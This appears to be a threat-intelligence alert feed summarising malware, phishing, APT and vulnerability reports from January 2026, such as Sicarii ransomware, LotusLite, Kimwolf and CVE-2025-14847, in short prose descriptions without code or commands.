ALERTS 2026 2025 2024 2023 2022
HOME AI APT BOTNET CAMPAIGN CRIME CRYPTOCURRENCY EXPLOIT HACKING GROUP OPERATION PHISHING RANSOM SPAM VIRUS VULNEREBILITY | 2024 2025
2025 January(36) February(50) March(77) April(54) May(54) June(65) July(50) August(54) SEPTEMBER(61) October(61) November(51) December(27) | 2026 January(0) February(0) March(0) April(0) May(0) June(0) July(0) August(0) SEPTEMBER(0) October(0) November(0) December(0)
DATE |
NAME |
INFO |
CATEGORY |
SUBCATE |
| 17.1.26 | Sicarii Ransomware | Sicarii is a novel Ransomware-as-a-Service (RaaS) operation first discovered last year. The deployed ransomware variant is capable of file encryption, data exfiltration, credential harvesting, and network reconnaissance. It specifically targets vulnerabilities in Fortinet devices within the initial attack stages, encrypts victim files using AES-GCM and appends them with the .sicarii extension afterwards. As reported by researchers from Checkpoint, a defining characteristic of the malware is an active geo-fencing mechanism that blocks execution on systems located in Israel. | ALERTS | RANSOM |
| 17.1.26 | LotusLite backdoor delivery campaign | The Acronis Threat Research Unit has detected a targeted malware campaign aimed at U.S. governmental entities. The campaign utilizes politically themed malspam with .ZIP attachments to deliver a custom C++ backdoor dubbed LotusLite. The backdoor is designed for espionage and it communicates with a hard-coded IP-based command-and-control (C2) server, enabling remote command execution, data collection/exfiltration, and establishing system persistence. | ALERTS | CAMPAIGN |
| 17.1.26 | Multi-stage ShadowReactor Campaign Delivers Remcos through Text-based Components | Remcos is a frequently seen Remote Access Trojan (RAT) payload. Researchers at Securonix shared details of a recently observed campaign, identified as Shadow#Reactor. In this multi-stage campaign, text-based files like VBS, PowerShell scripts, and encoded text are responsible for delivering the final Remcos payload. This involves various downloads of attacker-hosted content and the use of a LOLbin (msbuild.exe) to legitimize the malicious activity. | ALERTS | CAMPAIGN |
| 17.1.26 | deVixor Android malware | deVixor is a new Android banking malware variant observed to target Iranian users in recent campaigns. As reported by researchers from Cyble, the attackers spread this malware by distributing malicious APK files via phishing websites that mimic legitimate automotive businesses. | ALERTS | VIRUS |
| 17.1.26 | VVS Discord Stealer | VVS Stealer is a sophisticated Python-based malware used to target Discord users and exfiltrate sensitive information. As reported by the researchers from Palo Alto Unit42, once deployed the infostealer searches for encrypted Discord tokens within LevelDB directory and harvests extensive account data, including credentials, billing information, and multifactor authentication (MFA) status. | ALERTS | VIRUS |
| 17.1.26 | IT3 Tax-Themed HTML Phishing Targets South African Enterprise Users | A phishing campaign targeting South African organizations is abusing SARS/IT3 tax certificates as a social-engineering lure. The email uses a subject styled like an internal reference string and delivers a malicious HTML attachment masquerading as a spreadsheet/tax document (e.g., Discovery TAX IT3(B)(C) _ <victim email address> xslx.htm). | ALERTS | PHISHING |
| 17.1.26 | GalleryEye Spyware Masquerades as “Free Saudi Numbers” App | We identified an Android campaign targeting Saudi mobile users with a trojanized application masquerading as a “Free Saudi Numbers” utility, but the underlying threat is GalleryEye hosted on MediaFire. The lure is designed to attract users looking for “أرقام سعودية مجاناً” (free Saudi numbers), a highly effective theme because it aligns with common needs such as account verification, messaging registration, and “virtual number” services. | ALERTS | VIRUS |
| 17.1.26 | CVE-2025-14847 - MongoBleed vulnerability exploited in the wild | CVE-2025-14847 is a recently disclosed high severity (CVSS score 8.7) Improper Handling of Length Parameter Inconsistency vulnerability affecting MongoDB and MongoDB Server in versions from 3.6 onward. | ALERTS | VULNEREBILITY |
| 17.1.26 | Multi-Stage AsyncRAT Campaign Abuses Dropbox and Cloudflare | A recent AsyncRAT malware campaign abuses Dropbox and Cloudflare to deliver its payload. Initiated by phishing emails with Dropbox links, the multi-stage attack continues by disguising malicious downloads using double extensions. | ALERTS | CAMPAIGN |
| 17.1.26 | RustyWater Campaigns in the Middle East | CloudSEK recently reported a MuddyWater spear-phishing wave across Middle East targets (diplomatic, maritime, finance, telecom), where spoofed lures and malicious Word docs drop a newer Rust implant they call “RustyWater.” | ALERTS | PHISHING |
| 17.1.26 | That performance report might give you Guloader | A recent report by researchers at AhnLab highlights a Guloader campaign disguised as an employee performance review. Following a successful social engineering attempt via malspam, the attached payload (a RAR file) is opened and its embedded Guloader executable is launched to begin the attack chain. | ALERTS | VIRUS |
| 17.1.26 | Astaroth banking malware leverages WhatsApp Web for distribution | Acronis Threat Research Unit has identified a new campaign of the Brazilian banking malware Astaroth dubbed "Boto Cor-de-Rosa." This latest iteration marks a significant evolution in the malware's capabilities, specifically regarding its distribution method. Astaroth now includes a Python-based worm module capable of exploiting WhatsApp Web to spread infection. | ALERTS | VIRUS |
| 9.1.26 | Recent Linux-based activities of the UAT-7290 threat group | Cisco Talos has identified a new campaign attributed to threat actor tracked as UAT-7290. The group primarily targets critical infrastructure and telecommunications providers in South Asia, though recent activity indicates a possible expansion into Southeastern Europe. | ALERTS | GROUP |
| 9.1.26 | PHALT#BLYX malicious campaign | A new malware distribution campaign, tracked under the name PHALT#BLYX, is targeting European hospitality firms using phishing emails that impersonate Booking.com reservation cancellation requests. As reported by Securonix, the operation employs a "ClickFix" social engineering tactic: victims who click the email link are shown a fake Windows Blue Screen of Death (BSOD) and are tricked into opening the Windows Run prompt and pasting a malicious PowerShell command to "resolve" the error. | ALERTS | CAMPAIGN |
| 9.1.26 | CVE-2025-52691 - SmarterTools SmarterMail vulnerability | CVE-2025-52691 is a recently disclosed critical (CVSS score 10.0) arbitrary file upload vulnerability affecting SmarterTools SmarterMail software, which is an email, groupware, and collaboration server designed as an alternative to enterprise collaboration solutions such as Microsoft Exchange. | ALERTS | VULNEREBILITY |
| 9.1.26 | Kimwolf Android botnet | Kimwolf botnet has been reported to have infected more than 2 million Android devices by tunneling through residential proxy networks. According to researchers from XLab the malware is a strain of the AISURU botnet family and has been active on the threat landscape since at least August 2025. The malware has the capability for various DDoS attacks, proxy forwarding, reverse shell and file management, among others. | ALERTS | BOTNET |
| 4.1.26 | Datebug APT campaign targeting governmental organizations in India | Researchers from Cyfirma have identified a targeted cyber espionage campaign attributed to Datebug APT group (aka APT36, Transparent Tribe). The campaign utilizes a deceptive delivery mechanism involving a weaponized Windows shortcut (LNK) files concealed within a ZIP archive, masquerading as a legitimate PDF to trick victims. The infection chain is notable for its stealthy, fileless execution. | ALERTS | APT |